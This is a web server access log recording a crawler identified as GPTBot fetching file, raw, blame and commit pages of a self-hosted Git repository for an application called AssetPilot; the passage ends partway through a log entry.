"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" -[17/Feb/2026:13:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12456] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12760] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" -[17/Feb/2026:13:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10840] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" -[17/Feb/2026:13:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16162] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13436] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" -[17/Feb/2026:13:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10115] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14282] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14309] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" -[17/Feb/2026:13:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 74.7.227.38] [Length 10167] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" -[17/Feb/2026:13:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15802] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" -[17/Feb/2026:13:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14876] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259725] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15460] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" -[17/Feb/2026:13:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11881] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18155] [Gzip 12.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" -[17/Feb/2026:13:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" -[17/Feb/2026:13:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10174] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" -[17/Feb/2026:13:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16440] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" -[17/Feb/2026:13:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16607] [Gzip 8.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22886] [Gzip 13.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9953] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11416] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10665] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 6903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 19132] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 10178] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 16007] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" [Client 74.7.227.38] [Length 10318] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/recent-commits" [Client 74.7.227.38] [Length 7530] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:13:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10908] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" -[17/Feb/2026:13:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11619] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14180] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11021] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10168] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" -[17/Feb/2026:13:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12208] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" [Client 